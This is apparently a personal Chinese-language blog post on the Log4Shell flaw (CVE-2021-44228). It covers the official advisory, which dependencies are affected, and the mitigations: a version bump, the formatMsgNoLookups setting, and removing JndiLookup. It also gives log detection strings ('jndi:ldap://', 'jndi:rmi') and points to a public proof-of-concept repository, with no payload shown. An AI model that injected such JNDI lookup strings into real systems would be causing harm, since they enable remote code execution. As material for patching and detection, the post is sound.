life will change

CVE-2021-44228 Issue

發表於 Disqus:
文章字數: 2.4k 所需閱讀時間 ≈ 2 分鐘

CVE-2021-44228 Issue

平常滑FB大多是看看程式社群的情報內容,但沒一次燒到自己身上,沒想到這次這麼特別燒到log4j2上
於是就想來看看發生甚麼事情了

1. 先找官方說明看看

CVE-2021-44228

logging.apache

問題描述:
Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property “log4j2.formatMsgNoLookups” to “true” or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code execution by defaulting “com.sun.jndi.rmi.object.trustURLCodebase” and “com.sun.jndi.cosnaming.object.trustURLCodebase” to “false”.

1
Apache Log4j2 <=2.14.1 在配置、log訊息和參數中使用的JNDI功能不能防止攻擊者控制的LDAP和其他JNDI相關端點。攻擊者如果能控制日志信息或日志信息參數,在啟用信息查找替換功能時,可以執行從LDAP服務器加載的任意代碼。從log4j 2.15.0開始,這種行為已經被默認禁用。在以前的版本(>2.10),這種行為可以通過設置系統屬性 "log4j2.formatMsgNoLookups "為&#8220;true&#8221;或從classpath中刪除JndiLookup類(例如:zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class)而得到緩解。Java 8u121(見https://www.oracle.com/java/technologies/javase/8u121-relnotes.html)通過將 "com.sun.jndi.rmi.object.trustURLCodebase "和 "com.sun.jndi.cosnaming.object.trustURLCodebase "默認為 "false "來防止遠程代碼執行。
2. 搜尋解決方案

Log4J2 Vulnerability and Spring Boot

先從有使用的引入著手:

  1. spring-boot-starter-log4j2
  2. log4j-jcl
  3. aliyun-log-log4j2-appender

救火現況:

  1. spring-boot-starter-log4j2 : 等待v2.6.2 先採設定log4j2.version > 2.15.0 為主
  2. log4j-jcl : 直升2.15.0
  3. aliyun-log-log4j2-appender : 等待github上的 先採設定log4j2.version > 2.15.0 為主
1
2
3
<properties>
    <log4j2.version>2.15.0</log4j2.version>
</properties>
3. 其他解決方案
  1. 修改jvm引數 -Dlog4j2.formatMsgNoLookups=true
  2. 修改配置log4j2.formatMsgNoLookups=True
  3. 將系統環境變數 LOG4J_FORMAT_MSG_NO_LOOKUPS 設定為 true
  4. 刪除特定的class 
    1
    zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
4. 攻擊檢測

可以通過檢查日誌中是否存在“jndi:ldap://”、“jndi:rmi”等字元來發現可能的攻擊行為。

5. 測試攻擊

因為剛好在github上看到了這個專案決定來玩玩看
tangxiaofeng7 - CVE-2021-44228-Apache-Log4j-Rce

python -m http.server 8888

參考自:

Log4J2 Vulnerability and Spring Boot